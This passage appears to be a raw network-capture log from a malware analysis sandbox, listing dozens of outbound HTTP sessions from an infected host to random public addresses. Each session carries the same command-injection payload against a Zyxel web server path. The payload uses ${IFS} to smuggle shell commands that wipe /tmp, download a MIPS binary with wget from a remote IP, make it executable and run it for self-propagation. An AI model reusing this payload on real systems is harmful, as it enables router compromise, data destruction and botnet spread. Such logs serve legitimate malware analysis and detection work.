                              Mar 31, 2024 08:42:11.407250881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8725192.168.2.1349504162.160.217.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407269955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8726192.168.2.1351236204.208.125.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407294989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8727192.168.2.136092036.58.232.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407351017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8728192.168.2.1343448168.38.189.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407406092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8729192.168.2.1348684158.180.43.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407452106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8730192.168.2.136095838.250.242.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407478094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8731192.168.2.1334930145.107.197.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407536983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8732192.168.2.1349388143.57.133.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407577991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8733192.168.2.13412825.78.106.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407614946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8734192.168.2.136075486.159.148.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407659054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8735192.168.2.1344582194.21.12.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407716036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8736192.168.2.1357192103.185.197.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407744884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8737192.168.2.134428286.228.225.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407769918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8738192.168.2.135786697.51.65.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407826900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8739192.168.2.134481471.166.30.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407850981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8740192.168.2.1344124189.97.60.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407890081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8741192.168.2.134682631.67.31.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407927990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8742192.168.2.135784812.66.158.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407957077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8743192.168.2.1351678149.77.97.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407985926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8744192.168.2.1332908108.87.200.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408041000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8745192.168.2.133964035.137.30.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408081055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8746192.168.2.1336870162.64.92.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408107042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8747192.168.2.135350482.250.255.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408158064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8748192.168.2.1336760116.59.201.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408196926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8749192.168.2.1353980146.207.19.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408231974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8750192.168.2.1338344176.88.2.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408281088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8751192.168.2.1357116148.128.217.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408305883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8752192.168.2.1333190119.235.194.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408332109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8753192.168.2.1342124195.134.146.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408375025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8754192.168.2.136009471.118.128.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408409119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8755192.168.2.1354148175.1.48.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408459902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8756192.168.2.1333436160.223.147.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408488035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8757192.168.2.1350024147.22.22.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408512115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8758192.168.2.134140419.122.179.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408557892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8759192.168.2.1338064116.208.62.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408577919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8760192.168.2.135669866.229.41.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408607960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8761192.168.2.135989254.66.208.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408659935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8762192.168.2.134557225.251.138.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408716917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8763192.168.2.135179614.11.40.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408757925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8764192.168.2.135813835.140.40.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408790112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8765192.168.2.1354792103.199.106.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408822060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8766192.168.2.1354924132.55.36.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408848047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8767192.168.2.13510865.154.8.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408912897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8768192.168.2.135273434.64.224.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408965111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8769192.168.2.134811860.60.34.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.408968925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8770192.168.2.13526845.36.252.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409039021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8771192.168.2.1343004187.205.242.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409058094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8772192.168.2.1354254204.21.251.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409117937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8773192.168.2.1359020198.228.100.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409153938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8774192.168.2.134860245.24.56.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409183025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8775192.168.2.134112285.11.166.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409234047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8776192.168.2.1341374172.209.17.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409288883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8777192.168.2.134555467.54.128.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409311056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8778192.168.2.1333050132.14.133.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409363985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8779192.168.2.13580268.245.15.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409394979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8780192.168.2.1335668119.135.216.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409451962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8781192.168.2.1334670100.221.199.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409502029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8782192.168.2.1336726213.184.109.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409521103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8783192.168.2.1337926186.185.170.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409571886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8784192.168.2.133436277.88.6.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409606934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8785192.168.2.1343164110.1.118.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409670115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8786192.168.2.1335140169.28.65.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409696102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8787192.168.2.135694050.130.104.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409737110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8788192.168.2.1334662163.64.121.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409780979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8789192.168.2.1350124191.34.190.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409810066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8790192.168.2.1360994213.221.146.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409874916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8791192.168.2.135242286.120.129.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409890890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8792192.168.2.1338594116.233.194.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.409933090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8793192.168.2.1338332138.251.48.229443
                              TimestampBytes transferredDirectionData
